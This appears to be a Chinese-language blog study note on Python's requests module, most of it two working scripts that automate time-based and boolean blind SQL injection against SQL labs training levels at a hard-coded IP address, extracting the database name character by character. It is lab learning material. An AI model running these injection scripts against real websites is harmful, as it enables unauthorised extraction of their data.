python解決盲注和延遲注入筆記
requests模塊
要用python解決這一問題需要了解request這個模塊,我下載的是pycharm所以自帶這個模塊不用安裝,需要安裝的話
pip install requests
pip命令執行就能安裝成功,然後是關於requests模塊的一些函數:
get請求 | post請求 |
---|---|
res=request.get(url,params=data) | res=request.post(url,data) |
這裏res是響應response 的縮寫;
括號裏也有很多參數:
1. url
2. header
3. params(get請求)
4. data(post請求)
5. files
6. cookies
等等;
- res.text 響應頁面內容
- res.status_code 響應碼(200)
- res.encoding(頁面編碼)
- res.content 二進制形式響應正文
- res,headers響應頭部
- res.cookies 訪問cookies
總之requests是一個功能強大的模塊,可以定製頭部信息、get傳參、post傳參、上傳文件、重定向、會話跟蹤、cookie信息等等;
爲了熟悉這個模塊來使用這個模塊解決SQL labs中盲注和延時注入的問題,這裏只做到暴庫這一步,直接上代碼截圖:
解決延時注入
import requests
import string
url = "http://43.247.91.228:84/Less-9/"
def iftimeout(url):
try:
res = requests.get(url,timeout=3)
return res.text
except Exception as e:
return "timeout"
dbnamelen = 0
while True:
dbnamelen+=1
dbnamelen_url = url+"?id=1'+and+if(length(database())="+str(dbnamelen)+",sleep(5),1)--+"
print(dbnamelen_url)
if "timeout" in iftimeout(dbnamelen_url):
print("庫長:",dbnamelen)
break
#暴庫長 庫長爲8
dbname=""
for i in range(1,9):
for j in string.ascii_lowercase:
dbname_url=url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+j+"',sleep(5),1)--+"
print(dbname_url)
if "timeout" in iftimeout(dbname_url):
dbname+=j
print("庫名:",dbname)
break
#暴庫名
爆出來的庫名
解決盲注
import requests
import string
url = "http://43.247.91.228:84/Less-8/"
htmlLen = len(requests.get(url=url+"?id=1").text)
print("the len of HTML:"+str(htmlLen))
#暴庫長
dbNameLen = 0
while True:
dbNameLen_url = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"
print(dbNameLen_url)
if len(requests.get(dbNameLen_url).text) == htmlLen:
print("the length of dbName:"+str(dbNameLen))
break
if dbNameLen == 30:
print("Error!")
dbNameLen+=1
#暴庫名
dbName = ""
for i in range(1,9):
for j in string.ascii_lowercase:
dbName_url=url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+j+"' --+"
if len(requests.get(dbName_url).text) == htmlLen:
dbName += j
print(dbName)
break
跑出來的庫名和上圖一樣
總結
python是個好東西得好好學!!!
這也是我看學習視頻的總結筆記,很基礎,勿噴